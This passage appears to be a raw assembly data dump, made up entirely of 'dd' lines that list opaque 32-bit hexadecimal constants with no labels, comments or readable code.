		dd 0CDAD73Ah, 7B99A20Fh, 8ECAE4CBh, 909D18C4h, 4E87D5DAh
		dd 0C12CCB43h, 87815734h, 20F4345Bh, 889CFF60h,	0C98648B8h
		dd 0E1F888ABh, 5068CEF9h
		dd 8D85DDDBh, 7C82DF3Bh, 0FB4CFD2Ah, 7F532039h,	81C3FE26h
		dd 86073FC8h, 0A60DB18Fh, 301DD368h, 0BE4EB927h, 299F6C53h
		dd 1B75A257h, 2AE90781h, 51FDCF23h, 0F3905C2h, 2DDAC36Fh
		dd 5CA0CD6Eh, 70E51E2Dh, 696A5493h, 0C6C64763h,	752B3B8Ah
		dd 0BFFD2071h, 0EC090D23h, 23E7A4F5h, 2AFB58EDh, 0B354E823h
		dd 3C1DE088h, 75A3A556h, 0D0894585h, 6DD135BCh,	0EF16358Eh
		dd 0DDC4F180h, 55DE5AFBh, 931AA9D4h, 26598382h,	11BD53Bh
		dd 7AED5F20h, 0B2B7948Fh, 51C6843Bh, 0F5B285E9h, 0B420B372h
		dd 5119693Ch, 0C023A5CFh, 0F828403Ah, 0FBEA172Bh, 14ECBDBDh
		dd 0F4B27ABFh, 0FC6419E1h, 0ED4DDDE0h, 735B3DD0h, 0E362FCD1h
		dd 2B1C998Dh, 0A7D40C39h, 0E1313F1Dh, 0B379BBB6h, 5578145Fh
		dd 0B21C2DBh, 118EE983h, 685B89B6h, 1F09FDDDh, 75954675h
		dd 0C160AE2Dh, 2C958967h, 290579B2h, 93B8E99Ch,	388CC607h
		dd 0A392237h, 0E26D5386h, 2BE160C3h, 5F7E1739h,	0D7AA79A0h
		dd 6C7A0D97h, 0C37AED01h, 0CCD62F0Fh, 0C5EAB9CAh, 14CEAB9Ch
		dd 0D1412C0Eh, 3E6E044Eh, 1CFDC285h, 0E5506821h, 299E545Fh
		dd 238351C3h, 1EB74D35h, 83F0E07Fh, 101E3AC7h, 47EFC1F6h
		dd 0D33B91EBh, 16041F18h, 0FCA4148h, 0BDF5A351h, 0FDE5E222h
		dd 404D5F27h, 5E20DBACh, 0FC36C775h, 27E65369h,	4BB01F89h
		dd 0F4171AF9h, 948D52B4h, 0F79C2936h, 1AA6A289h, 0E58C7EDFh
		dd 26717FC5h, 69A7A854h, 5A518E64h, 5E6D312Bh, 6ABD1D4Ah
		dd 0C88A1B32h, 635969D5h, 0A8BF0209h, 942D50Ah,	0C706A4BBh
		dd 9917959Dh, 6BD9FD4Ah, 29EF87Dh, 9C48A776h, 19C6A9A2h
		dd 465BF43Fh, 6799CEB9h, 0F757DF9Eh, 7FAAAACFh,	94C4610Dh
		dd 0D6665A24h, 0AF176C85h, 0DC5CAA05h, 0F78EDAAAh, 3BB2142Fh
		dd 0DFC47F68h, 8477A97Bh, 622AB1C6h, 1A325A3Ch,	6CCBB0B4h
		dd 0DDAE602Dh, 0EF6F6E57h, 68F604DEh, 4BFDCA21h, 0BEB1DF04h
		dd 152958C8h, 3174E5B1h, 85398A35h, 1EA5B153h, 0F0E176D7h
		dd 9F318EE6h, 7C0F8ABh,	0DDC96099h, 2A85FC74h, 71B53E79h
		dd 7D246256h, 0E31F2756h, 4D74F561h, 0EB2377D8h, 4A06F6CBh
		dd 0F3026EF4h, 89995247h, 0FFE75D06h, 0CE5AC169h, 0EDD7FB56h
		dd 258C37F3h, 0E54F45C5h, 12BB8561h, 755835EFh,	67689EFEh
		dd 0DA77F72Fh, 0CA1D7FD9h, 755040E3h, 7C4ADAADh, 54457468h
		dd 2D0C1FC7h, 2AA04D35h, 585EBC23h, 0B81D9EB8h,	0FA6FCA87h
		dd 0CA6AD540h, 0FFB2CC38h, 68F5EF1h, 0EFAAC935h, 0B1F7A673h
		dd 0CD8567A5h, 0BC256C25h, 61FC3B9Fh, 0DAD232D1h, 0DBE0859Ch
		dd 0F813211Fh, 27C8507Dh, 226AADDCh, 0F50C08A5h, 0F29025A5h
		dd 10C8EF6Ch, 0EFD9F5E1h, 0A2B40175h, 41DFFD25h, 0E6717F3Ch
		dd 5C2D4497h, 29D7310Ch, 4F53FDA9h, 0E05BF1AAh,	0A33FDB7Eh
		dd 16B808BFh, 435C097Fh, 3689502Bh, 0F86D886Dh,	0F4BD59C0h
		dd 0D49C757Dh, 0A57E4129h, 0B83EA32Fh, 10D8E14Bh, 3B6C6898h
		dd 0C1E27CABh, 0AA0EAF39h, 0F9B441E6h, 5E05926Fh, 8ED96F15h
		dd 92F1A72Fh, 70D621Bh,	1FE4C115h, 92A7F357h, 21AD23F3h
		dd 129FA9F4h, 0B9FD7322h, 0F6C80720h, 0ECE3FDD3h, 3CDF44AFh
		dd 96477DECh, 0F74C7C7Eh, 39356B03h, 0A0E6D554h, 0B2F80B1Bh
		dd 0E2038Ch, 904DBC8Ah,	5B5F2DC9h, 0F17D5DCh, 4FA8EA5Ch
		dd 9B4E05C8h, 0AFEDAA56h, 0E568D2EAh, 0B9761FBCh, 1B930B2Dh
		dd 0B1AA51B1h, 0EB358354h, 0A434BCD6h, 2546A97Ch, 0B6CEB16Ch
		dd 1B5C3E05h, 0BD219C3Fh, 31F1D8A9h, 0B492C06Bh, 496529FDh
		dd 0B52C0917h, 1CAE4DDFh, 0ED2103B1h, 96211E07h, 63F63B7Ch
		dd 0D6BB4FCEh, 3E0685FCh, 0A7B336CEh, 8D8F1CCAh, 0F8EA945Fh
		dd 0AC3E89FEh, 875AEE67h, 0ADF0DDB7h, 2C091B3Ch, 0F6187870h
		dd 18964A8Dh, 891BA2Eh,	96A99B42h, 56D19426h, 0EEB39FD1h
		dd 0F9D52981h, 25A24CA0h, 10F27C6Dh, 0A584D2AAh, 0B55E4072h
		dd 9C60AF2Ah, 0AC5F35E2h, 9F197EFBh, 0F6D5178h,	8745E6BDh
		dd 0C218AFE3h, 0BD4616D8h, 0D8977E45h, 94EF2C66h, 0A7F493ECh
		dd 0C1ABC94h, 14B80532h, 0B0A6FE1Bh, 8E503429h,	0B3885DE8h
		dd 0A647EC4Bh, 7E5B7FAEh, 523A44AFh, 9A0995C6h,	80AE9177h
		dd 81F86E85h, 998D0EA7h, 0C3A49E9h, 85F03EBh, 0A6853B7Ch
		dd 8DB2CF51h, 5D746A8Ch, 6A2FC956h, 98549A1Ch, 8AB9ED7Dh
		dd 0AB0ED6D1h, 0B6E1DCB8h, 0DA244F77h, 6B8AB807h, 2822EAD1h
		dd 0E4560AB1h, 4837D6E4h, 82990068h, 36713F39h,	27CB9A11h
		dd 8BAB06A3h, 0E603EE94h, 5D534850h, 0C86C2736h, 46CFD88Bh
		dd 7A5DB1E9h, 0B054894Ah, 157F3458h, 0FD40052Fh, 5F603981h
		dd 0ABB2B247h, 0BCF8B5AAh, 807E48F9h, 2BA468C4h, 0ADB1219Dh
		dd 0F8F236h, 418FA6F9h,	6D2986DBh, 0FE591905h, 0D9EEB9A3h
		dd 0BA77AC91h, 9B012C88h, 3D8515E0h, 7F2C23BFh,	0ACD2B468h
		dd 42DBD216h, 0AE3D9B0Eh, 5F08BC61h, 0C87F88D3h, 88583B73h
		dd 0E8D15F8Fh, 1AB7CCDEh, 816DFEB7h, 89820ABEh,	0D2687FD1h
		dd 48D0C315h, 0BB4E572Ch, 0CAE59B6Ah, 0AFBDEB44h, 5CD77BCEh
		dd 0C66BC449h, 5C54DEEDh, 0E34577F1h, 69C3B722h, 175F44F0h
		dd 7E55A2C9h, 908D6AC2h, 0BBBF7CCDh, 7317E2CEh,	294E0FC1h
		dd 0E106B003h, 0A2AA8596h, 4765656h, 5A78FE7h, 4AC95167h
		dd 0A0C8B508h, 0A596923Ah, 0AD4CF0EAh, 29D015D0h, 0ED16DD5Ch
		dd 0B1FD13CAh, 0A8EE4755h, 117F31F1h, 0B9BA4E97h, 0B6B4651Dh
		dd 0B736BB05h, 0AD745077h, 7BFF619Bh, 0A61FA073h, 61421CFFh
		dd 52DCC2C3h, 15EE77ABh, 17C25BE2h, 1177EAACh, 128D2F3Fh
		dd 0EE2C4C07h, 9608BA34h, 302F24ACh, 0F1C00CADh, 42FB3285h
		dd 0C4AAD5EAh, 0FF4DC334h, 0D68BE340h, 0CABC8942h, 8EC3D668h
		dd 73CAD64Fh, 0BC5D9B9Eh, 6BB52E80h, 6DA37B21h,	0BEE10FCh
		dd 3703CA3Ch, 766C49ABh, 337D3B13h, 646D288h, 9EB6C23Fh
		dd 9DADDF2Ch, 1D5795A9h, 3DE550B3h, 0AAA7DE18h,	0B791643Ch
		dd 6FF8FDC9h, 45937AD7h, 22A5B51Bh, 19266DEEh, 0BEF521B1h
		dd 5FFDA01Dh, 0CCD48B76h, 0A987C8DBh, 0BA256DD3h, 3B170F0Ah
		dd 2AFD2866h, 0A5CACEAFh, 0F7C152EBh, 0A26FBF81h, 25186084h
		dd 80A2DB8Eh, 0FDCFE7ABh, 9C673E05h, 3F898604h,	74C0BF61h
		dd 0C8755F62h, 0DE5EC383h, 23F809C6h, 0A6D5B6B1h, 12FC6050h
		dd 7208ACFEh, 72290F9Eh, 0F8D6BA08h, 63EF10Eh, 507A08E6h
		dd 354DE7D0h, 75144BF9h, 136E9AF4h, 30AF6FA4h, 0CAE8446h
		dd 83B2271Bh, 7DCA8AA7h, 54821773h, 16B250Ah, 60794727h
		dd 9D9E0D8Eh, 308FE52Ah, 0D5479BEEh, 0EC567C8Ah, 0E9FCDFABh
		dd 0F3CAB6E2h, 5E656269h, 6DBA213Fh, 3078B497h,	7DC5A0CFh
		dd 0DC961CE1h, 0DEED71D0h, 0F4BD76CAh, 0FA93828Eh, 8BBD659Dh
		dd 0FA976AF7h, 0E07A071Fh, 0CF6F864Dh, 9123167Ch, 0FE39ECF4h
		dd 682F38FCh, 0EE3C5054h, 661F66FDh, 35AEAF8Eh,	834282E3h
		dd 0B18C3FD8h, 3FDB61AAh, 0FD80FE4Bh, 8C87554Eh, 0F65B1A68h
		dd 6E79025Ch, 0DBE51FCBh, 89213AA7h, 78BFCA1Eh,	0EC98C997h
		dd 178D0669h, 54B0FF17h, 549A06D5h, 0CC5C25A0h,	0CDE42C1Dh
		dd 8DD6D7E3h, 3DA3F6ECh, 0ECB5645Dh, 0C6AFFD1Dh, 0BBB08A07h
		dd 17E928A1h, 1B6A8C5Eh, 3F72F765h, 0CFDDE6B2h,	0F0EC5ED7h
		dd 745AACB5h, 2BDB7827h, 341137B6h, 0A0ACA3E2h,	19971AB4h
		dd 6FFDA733h, 6AF8632Ch, 8D6048B3h, 0F41779B8h,	809B211Ah
		dd 36A079F1h, 0DD392AFh
		dd 549B882Bh, 0CFC7F6Ch, 780C76A6h, 20698536h, 0B048D60h
		dd 86F67815h, 0F7E15A3Ch, 6B5C2B9Ch, 6FC581C7h,	0F36B461h
		dd 0C6A55D74h, 33E107D1h, 4A79E945h, 371FCFFAh,	44BFCDCFh
		dd 27CE5F6Ch, 0B4B2271h, 84D2AFC2h, 5119BC5Dh, 0A7C18D0Ah
		dd 9C1E11DEh, 3EA7872h,	0EE0B547Fh, 86B8FACFh, 9BC4D18Ah
		dd 0C20AE23Ch, 0C0F46E33h, 0DFC53CFh, 765E7995h, 0A8BA4A56h
		dd 4B095F57h, 2C252E99h, 1D50ED57h, 0B37AAAC7h,	0E582236Ch
		dd 12BC98D9h, 6747481Bh, 6D40C036h, 3D5B63D0h, 821F7175h
		dd 82E49839h, 1AD215B5h, 0CB475F13h, 0DB12ABCh,	8E45561Eh
		dd 86CE2F3Eh, 798B8B5h,	7C375AE7h, 20C57C61h, 50966B59h
		dd 0F442AB83h, 0F0FA2784h, 5CDF99C3h, 35680E80h, 56435FC6h
		dd 4A2F98C6h, 0B28A26EAh, 0DB6A11F8h, 0ABFF74BDh, 0F6F2B2BEh
		dd 0E38B5BAEh, 49FD16CDh, 9B39BDD7h, 0AB6DB33Eh, 0DD588E57h
		dd 4C937A66h, 9565B803h, 73703E33h, 4AB64CABh, 0EA874EB9h
		dd 0BB1D11Ah, 84215361h, 0D2B15A50h, 0E8F64084h, 0BDF928DFh
		dd 6194D5E1h, 4981BFADh, 0AC12EF41h, 36B1E152h,	0C16BDF46h
		dd 68EFCBCDh, 98B73B35h, 68B77BF4h, 0EE71519Bh,	0D181303Eh
		dd 0A1367DE4h, 9C3FF9DEh, 0DCB9A6C1h, 1617B557h, 983E72A4h
		dd 0C2355B5Dh, 4A710332h, 82EF2B47h, 81FD769Eh,	998ABF6Bh
		dd 0C578E426h, 580E4082h, 4A1C50BFh, 9767D033h,	18F10DE4h
		dd 5D7343ABh, 0AC6AF87Fh, 2FEF6E64h, 68BDBE02h,	0D8D9F2F9h
		dd 0E99D62D9h, 1ADC7CCh, 462EB136h, 75A77DCBh, 887E49EBh
		dd 5577536Ch, 0FEFD1ACBh, 568F6FD1h, 2B895665h,	0CF99BC58h
		dd 564B4CF6h, 0DA356B8Ch, 0A0542456h, 9D9A3B62h, 0BCE9B0F6h
		dd 70B48C07h, 2BF6951h,	3BA57F71h, 15DD1FB8h, 1D6DBA96h
		dd 0D982E85Fh, 11495138h, 9ED99954h, 768B18FEh,	3665C22Ah
		dd 12664E7Bh, 128FCBC1h, 0F7ECE9CAh, 576630BEh,	9A44B0FCh
		dd 814B22BEh, 0C2DF53B2h, 3EBAC9BCh, 67DC3274h,	2646C902h
		dd 7D52021Ch, 27C532BEh, 271A04BEh, 4735477h, 9D10273h
		dd 0D29516ABh, 39DD75CDh, 31781A10h, 181F2887h,	0F12BAD72h
		dd 2F2744C3h, 0D300BC02h, 86BD8ECBh, 7A0B8C4Bh,	7719E0A2h
		dd 57D846ADh, 9A9089E6h, 0BB92D157h, 69B49E79h,	3D6B1475h
		dd 27220A25h, 96A2B58Ch, 0A154FBCEh, 0EE7FB8BBh, 3BE20A9Ah
		dd 4603825Eh, 0A4C5C5F5h, 1E877F40h, 2B57D2E6h,	9B5BE339h
		dd 0ABCF0B47h, 8FC032B6h, 6F9213CBh, 0EF0129DAh, 7956BA77h
		dd 0C5BC999h, 7C5BBEABh, 0FAB4159h, 679A1EFCh, 0A5086891h
		dd 0A8623CC6h, 99AA6775h, 0C095E14Eh, 78D8B9C1h, 0C7D48D6Eh
		dd 8BCA2065h, 92FF8E19h, 0AE0B2972h, 615808ACh,	0FF4ED66Fh
		dd 8286CBC7h, 0ABDAE455h, 0FB540536h, 629336B5h, 0DAF21554h
		dd 0EECBEBE6h, 0F465A1A8h, 0E4FA45Fh, 76195421h, 5077D1A2h
		dd 80E37604h, 0D4F93C16h, 0B7FB7713h, 0FC02B23Fh, 0FCD25957h
		dd 0EA30A6A7h, 0ED34B681h, 0D952EF5Ah, 0E901A302h, 1ED65D72h
		dd 90556C86h, 582DE261h, 16874952h, 0B2951E1Ah,	0C65732BFh
		dd 0BAC41E6Ah, 0E6FC9D0Dh, 0AD0981D5h, 5CAEDB24h, 274F66BFh
		dd 0E68E8BF8h, 0DF0B44D5h, 4EBE733Eh, 84646BBCh, 81E0B4D7h
		dd 3D5D1EBBh, 0AD9551E3h, 85B24AA2h, 0D237E449h, 2E137801h
		dd 92E2D955h, 4B5B330Eh, 0DC37E595h, 18FC5322h,	506A6C46h
		dd 0CA5E6E37h, 0A09CF471h, 37424511h, 7473B6DAh, 0AA7C91Bh
		dd 0D42B59FBh, 7F88BED1h, 0ACF3D445h, 95BB4DD9h, 51AB5D3Eh
		dd 0F80CCF5Fh, 0D4C06461h, 0D428BBA4h, 0BFEAF0B2h, 0B051EEB0h
		dd 56D5EF0Ah, 0CBA11C5Eh, 8B89543Dh, 0ABC3597h,	0CD445C94h
		dd 696C7B5Ah, 4DB3BEABh, 0F56B3D21h, 0C7A376AEh, 11084527h
		dd 0DDDCF52Ah, 0DB2CA607h, 0D0FC2FC2h, 0C12BD0A5h, 27317CCDh
		dd 93AC42F3h, 3C9D578h,	0B2B2E717h, 1BADFAC2h, 2EA33CECh
		dd 0F8BDB641h, 45087BA1h, 0A950D63Dh, 0D63DE9D0h, 0A1CFAAFAh
		dd 2DB09B98h, 15E82C34h, 0FF5BB2D0h, 0A582C590h, 0D5595D60h
		dd 77F25F04h, 0F76519Bh, 8313F9CCh, 0BEE889FDh,	1D122FDAh
		dd 1ECE0EE0h, 0C217A1AFh, 6C9CDD95h, 0AE4EE1C2h, 0FC40FDAh
		dd 3F1DDA11h, 6A92FB9h,	6FBC6323h, 0DD4568CCh, 8DFE1094h
		dd 0A1E686BCh, 0A4B0F67Ah, 79BFB38Eh, 4C830F87h, 967B4B6Dh
		dd 6F8A4982h, 6BB0C135h, 0D0B15967h, 7E0BC6B0h,	66DB7378h
		dd 542D2786h, 7CD617AAh, 64FF45DCh, 129FED18h, 81DF7F89h
		dd 6BD54192h, 0D068F03Eh, 0ACCBBADBh, 0F8DE814Eh, 931E69E5h
		dd 4C5E0E8Ch, 712A9ADh,	4A8432BCh, 4F053A56h, 1875F9Ch
		dd 25F79C9Ah, 6AFFAE2Dh, 0C21997FBh, 0F5AE15BCh, 130FEB31h
		dd 50B7D40Eh, 78143B3Eh, 0D1A86755h, 0E59D1498h, 95B79400h
		dd 898CE2D4h, 9A07E77Ch, 0A76174C1h, 7F747E2Ch,	0AE30EA95h
		dd 0BB9854DAh, 261D5C68h, 26A3AEEh, 1F872B6Dh, 67D338F8h
		dd 0B8D5624Dh, 0D988AA90h, 631A23D5h, 0CAC4C0DEh, 0A9EDDDE7h
		dd 3895AB17h, 966619D3h, 1EB45775h, 8FBF8B5Ah, 0E07E3D8Ch
		dd 341A13E1h, 0BD60327Dh, 7572D368h, 3914B9BDh,	58EDBA5Bh
		dd 1F1C5E50h, 1CD4E99Ch, 939128FFh, 72AC8A03h, 0F2F0F59Fh
		dd 0DEC312B9h, 56593C09h, 0FC0ACB07h, 0D3BCD9D9h, 7E2B30B8h
		dd 2091FE8h, 0CE8791E1h, 61675BE3h, 0AF74CCFh, 3E9C7E75h
		dd 0B3595B55h, 3502F68Dh, 0D48D2C7Eh, 0E0554446h, 2F57EFBDh
		dd 0F9F1E2E9h, 0FB080916h, 1E072057h, 0AB57D28Fh, 0FCFBEF5Ah
		dd 332EBAE5h, 0C423F6Eh, 1F5B061Bh, 0ABA6BD0Eh,	215F062Dh
		dd 96750281h, 15CA701Ch, 1598FF3Ch, 44984C1Ch, 6AF1FB88h
		dd 0F494CD61h, 0F42A3ADCh, 369BFCCAh, 1413AB5Ah, 3C0F1F75h
		dd 62A97712h, 0E0878355h, 0D7C9C315h, 4C2712ADh, 39F3BD4Bh
		dd 0EBB52312h, 631D6986h, 0AFCC42D9h, 0DD3A9F28h, 0B3B25402h
		dd 0BC5EB924h, 5796B015h, 54CFD576h, 8AA408C8h,	95EBDB6h
		dd 2E5D236Fh, 0D0D37A12h, 0E0998398h, 3F1F0AA0h, 0A6C32BE5h
		dd 0E9B7D07Ch, 70904EA7h, 0C6DE92B6h, 7A84487Fh, 83AC950Bh
		dd 5AEBC22Ch, 0D1D7AE8Fh, 7A22AB7Dh, 2BB8CAE6h,	0A73B6D70h
		dd 0E6FDCCDEh, 6079035Dh, 7A5E4290h, 9B8FB332h,	98981BECh
		dd 0CD3F5A63h, 902D9F04h, 563631B9h, 96D6D8A6h,	0BCA39CB7h
		dd 0EEA9E52Ch, 36D64924h, 49650EA9h, 484DEE14h,	71F39D5Fh
		dd 80B441C6h, 4C0ACEFDh, 699171ACh, 0A18767D5h,	9E4828CCh
		dd 9541E2D5h, 2572DCFAh, 4781FDB8h, 0A698E88Dh,	1FC83B94h
		dd 54AB78EDh, 47282ED6h, 0AA8CCE0h, 970436FDh, 992FF0BBh
		dd 7E5F33D7h, 0CFF149D0h, 0E26332DBh, 1E9C7E47h, 7E19C103h
		dd 0E6F55345h, 982768BEh, 5E22A809h, 49C769F4h,	5B7AC1ABh
		dd 4A46A1A2h, 5A22D98h,	4E254313h, 77363D2Ah, 43F31492h
		dd 8CEC4687h, 66FE8AE2h, 0CAA35829h, 6E06A553h,	0A2C2EC7Bh
		dd 5574429Ch, 8C4CB5F3h, 8356BEDEh, 0A8851B63h,	0E705CACBh
		dd 26E52B17h, 0EB3C432h, 0F42D8132h, 12C8BAC4h,	642B11AAh
		dd 0D17DA4CEh, 52BEEA8Bh, 161DE297h, 46DD723Eh,	0BFB5415Ah
		dd 0ACB94A91h, 59E6D226h, 75BF2D17h, 0EF930BA2h, 4FC0A481h
		dd 0C39E42B1h, 1AFAD4E4h, 9ECF65D2h, 95BC36DFh,	0CCA08219h
		dd 12E7F115h, 1C91D0FAh, 0D86F76A0h, 7929C15Dh,	0BFA37236h
		dd 0CBF4D558h, 66355B70h, 81F51A3Bh, 0F33D9685h, 0FCA25617h
		dd 9FC4C9A6h, 85A93808h
		dd 56B4CF0Eh, 7E1BA2F0h, 6D0BDD98h, 2AF8A7FDh, 76884CF0h
		dd 0D545C8AAh, 0DA99F6CFh, 4F165602h, 0EE07AB31h, 0C440690Ch
		dd 0BDA28D11h, 0A79CAEEBh, 2414AD8Fh, 0D0478BECh, 0EC530158h
		dd 0EE262B8Eh, 0A0D0B3B3h, 78CCD56h, 0A975CBC7h, 21A6FE33h
		dd 0D9341DCh, 6AE42784h, 83C50E94h, 7AE997FBh, 0DFC165EAh
		dd 99434279h, 78E0BE83h, 4F910A5h, 416F6365h, 54BB552Bh
		dd 8385247Ah, 175A92F3h, 0C1D75F94h, 26EB7F0Fh,	63318AB4h
		dd 12F799C7h, 87D50A4Dh, 35013E1h, 0CF81BEC2h, 0FEF1A98Ch
		dd 597788A2h, 0F9944019h, 0CAAA06D2h, 1588AABh,	7465256Fh
		dd 73446CF1h, 64E21905h, 0ABECDCA1h, 0E51F572Bh, 8EAD0FEBh
		dd 0F13E83E2h, 74E07BBEh, 0E8AFCE65h, 191AA4FFh, 6DA3F705h
		dd 713079DCh, 0D172891Bh, 0B49B27C5h, 0D48E5789h, 0F8CF0ADFh
		dd 1F6878E1h, 94886CB4h, 810BBDC2h, 142725A2h, 34B5BEF3h
		dd 1FFE573Ah, 4CEB9569h, 0E07EA846h, 41A98F26h,	2727DD5Eh
		dd 0C8609637h, 2BFED382h, 53F9246Ah, 3FA87894h,	32EC7AB0h
		dd 0B523AF4Fh, 0C4BB6EBCh, 59C085FDh, 0D510B945h, 6D665EF1h
		dd 0FF9B30F6h, 9858B622h, 0D9BC9D7Eh, 0A6241D63h, 2A674C0Dh
		dd 0EF9418E7h, 56B6F8F8h, 976B88D6h, 0F062511Dh, 45753BD3h
		dd 293FEABEh, 7B53E5Ch,	5B748AE6h, 3F07E0D2h, 5648B68Dh
		dd 4C4F5540h, 0C13F937Ah, 0E88AE85Fh, 0FD42874Eh, 905FE320h
		dd 9388BBA0h, 590F616Eh, 3B2E6D4Ah, 0B88DC6D4h,	0C5FA6B66h
		dd 0B5B980B1h, 11DE497Ch, 0DCFE580Dh, 0EADC1651h, 78754672h
		dd 0DE8C2A6Bh, 80B12EA7h, 681445DEh, 16D129E4h,	0CA977B38h
		dd 6FC69D5Dh, 0F8F794C3h, 0D0343C1h, 5A254DEFh,	3E322914h
		dd 424C785Eh, 9672C5ECh, 3DECD53Dh, 0E0387956h,	5D2F27D0h
		dd 40592230h, 0CD57BECDh, 79940485h, 0B509E19Ah, 0BFAA189Dh
		dd 5270A945h, 6B5DF7E6h, 0E07A98C5h, 764F9ED2h,	4EBD4D3h
		dd 0EAFE3AEFh, 6AE34EFEh, 0EF403A6Ch, 0D6345ABCh, 0A2BF572Ch
		dd 0BA76ABA8h, 0C5A71D47h, 76A755AFh, 4F6AAF38h, 4361917Dh
		dd 70334ECBh, 0D5A71690h, 6474B233h, 3BDC8DB7h,	233039D4h
		dd 34BF6A42h, 3AFADA07h, 0C2EBBA6Bh, 0ACA77600h, 0C02C92CDh
		dd 0BBF9BB3Fh, 90218E43h, 5E530575h, 54364C1Dh,	0C350725Eh
		dd 0FA4DDE8Dh, 0D049D264h, 43C313B0h, 2B7453DBh, 0D8A7D7BAh
		dd 4556CE4Fh, 0D0C575EAh, 60799AAAh, 1E461BA9h,	53F71CA9h
		dd 6990ECCFh, 0AE599A9Fh, 0AA4180D2h, 9C9A87EEh, 85F601D4h
		dd 292D57DEh, 0A0662D1Bh, 0ECDDFA26h, 9CD2CF7Bh, 0DA4AB0B4h
		dd 9E092A80h, 0F07AC265h, 4557509Dh, 0B85F3E8Bh, 90592F30h
		dd 14E0E6B8h, 0BB3AE772h, 95D0950Ah, 0C057EEA6h, 0B476514Bh
		dd 9FE3FB39h, 0EF6E7497h, 71C2B298h, 61F0A4E3h,	7840CCD9h
		dd 7E849E09h, 0F477126Dh, 12D295A6h, 74AB86ABh,	5ABF8BF8h
		dd 2D57D37Dh, 0AEDDC9B3h, 335089A1h, 7B119DB5h,	55089F48h
		dd 9567A095h, 0E5A56705h, 0E59B2A82h, 0ABBEADF8h, 341DC179h
		dd 2DA22773h, 97D7572Eh, 0A6DE2338h, 0F37D732Fh, 980A2967h
		dd 606D2B78h, 3398FA4Ch, 0EED5AED8h, 0A8FA1E9Dh, 880DEACBh
		dd 0EF7BBADBh, 0CF02F73Fh, 92CC2B96h, 0FD59259Ch, 0AF3654B6h
		dd 0F1A514CAh, 4444D303h, 0DFACE7EDh, 130DA375h, 748A4EEDh
		dd 6AB46ACDh, 76EDCDE3h, 866B26FBh, 19B1D8Fh, 0D9427AF4h
		dd 3C50646Eh, 20C2804h,	4E304D3Dh, 31860E3Dh, 72FDAA7Ah
		dd 0D2BE2310h, 0ABDA5E83h, 0E2932F5Eh, 0D5332FBBh, 0C0D41588h
		dd 294C8F0Fh, 94F3694Ah, 0DA2B7D17h, 0AE343A85h, 0F0BB6576h
		dd 3F7A2FCAh, 0AE6BAD14h, 5D6A8FE4h, 6B4C21F8h,	7AF1FCA4h
		dd 0F994CF7Fh, 2C0FEEFDh, 72B9AB36h, 0F0DAAE76h, 0ECDC28E0h
		dd 72FE8214h, 49F6BB95h, 0F3843F41h, 0F7186E6Dh, 4FCDE963h
		dd 0AE9E1F75h, 0D78D6EE1h, 512696C0h, 562A5A24h, 43CA6D35h
		dd 895D6F17h, 0DC72771Bh, 0F41BFB3h, 9BD2FE2Ch,	0BF1E4A66h
		dd 1A30079Dh, 0B718BFE4h, 0F51D8C63h, 6574B563h, 0D6EB6504h
		dd 0B14494AEh, 84CCB580h, 0FFEFBDB2h, 0D23FD4ECh, 0BEC63B16h
		dd 83A8D800h, 0C4F31EDAh, 6762A15Ah, 0A4D5B9A8h, 0BE826FF0h
		dd 52FFD170h, 38F43838h, 0D9B28A02h, 3223B4F1h,	6B318FA0h
		dd 666D6BDBh, 83337363h, 0D851174Eh, 12C59A94h,	84B0FC87h
		dd 0F499520Bh, 0DCF37B75h, 0DF1A22EEh, 2AF9F095h, 26DBB35Dh
		dd 92E76698h, 1F733B8h,	5ABD0C43h, 249DBA3h, 816379C2h
		dd 3B404346h, 0A59819F0h, 85286FB5h, 97B4254Bh,	0B7B5B92Eh
		dd 86B7B679h, 7ED4B7DEh, 0B2FF12CFh, 3E0D2F81h,	361F5DBDh
		dd 0AACBEA5Ch, 7D6D87F3h, 1F4776E6h, 0DC661299h, 116C8F50h
		dd 69A2670Dh, 1AE865B0h, 1C1EF8D0h, 3D39F7EAh, 17924410h
		dd 8AAA5ABFh, 0B85DB533h, 6EA5B89Fh, 565EAAC7h,	2E658974h
		dd 0E4A8BF9Eh, 0F914F7E3h, 0C7BBFD67h, 0AB957BEEh, 0DAB20AA9h
		dd 0E3A47C09h, 752DB25Bh, 48181EC2h, 31E86EEAh,	0B1F51667h
		dd 76E2D953h, 79448BDh,	6BE68BD7h, 4EFE1C34h, 0C8910797h
		dd 5AB4F41Fh, 57F103CEh, 56EC0BABh, 94C5DE35h, 8FD91AE4h
		dd 6A71D37Dh, 53B07C6Fh, 6A249AC8h, 0F2FEADF8h,	12546303h
		dd 9674CEF0h, 0FACBABBAh, 853A84FDh, 7C9C895Fh,	0BED63739h
		dd 143B1DC9h, 0FE350A06h, 0BF0D1F79h, 9D55121Eh, 426690A5h
		dd 32B76C4Ah, 0E9D8CDBCh, 75A3A83h, 189AA76h, 75AED88Ah
		dd 9076A707h, 0DE547CABh, 5FE3F21Eh, 11B00684h,	0F6FE45C5h
		dd 0F6CF6155h, 615E04AFh, 5233BF16h, 0DF933B2Ah, 2664629Bh
		dd 8B370F1Eh, 0B89CDD82h, 0E1D0E7DAh, 0EACCA77Eh, 68E91982h
		dd 7A40FE27h, 0CFA1F12Eh, 8F9951A3h, 0D2BDF8FDh, 0AC5FDE7Fh
		dd 0DDD34532h, 57429110h, 54C8ED58h, 71E13249h,	0E3FDD215h
		dd 0C9B253EFh, 19FDA05Dh, 96EE1DA9h, 4139B360h,	0B6EC9749h
		dd 0AD646D09h, 0A8A6F16Ah, 239A29B0h, 0B508200Ch, 8FD00E64h
		dd 41E81E10h, 64342AC9h, 1721DE87h, 56B1F80Fh, 0C6074D8Eh
		dd 0A9DFD499h, 0F46F9F29h, 97D91701h, 7AD0B205h, 0C7992E43h
		dd 0F9E9E297h, 7DAD6C8Bh, 1D1BD40Bh, 0D1A4F7BCh, 0F7BA8D3Eh
		dd 2A563358h, 0B61FB621h, 40815B3Dh, 565385B9h,	7FC3DFC3h
		dd 0A25820DCh, 93B6910Ah, 9FA459B1h, 3EAB19Dh, 142C8E05h
		dd 68FED46Dh, 5F2A14B6h, 0CAAF5F4Dh, 79CBD4B1h,	0C33378AAh
		dd 0B89846FAh, 0E558DBAFh, 0C0A6BE5Eh, 7C292F66h, 0F8AB87D9h
		dd 49130455h, 7D518A19h, 3919E512h, 954BEC9Fh, 30732766h
		dd 61E8DC5Ah, 33DFEC0Eh, 6D4618DAh, 68C1691h, 0C07933EFh
		dd 5A7ECCE7h, 0E6FB1C07h, 20AD597h, 9F47F64Ah, 0F3AB12FAh
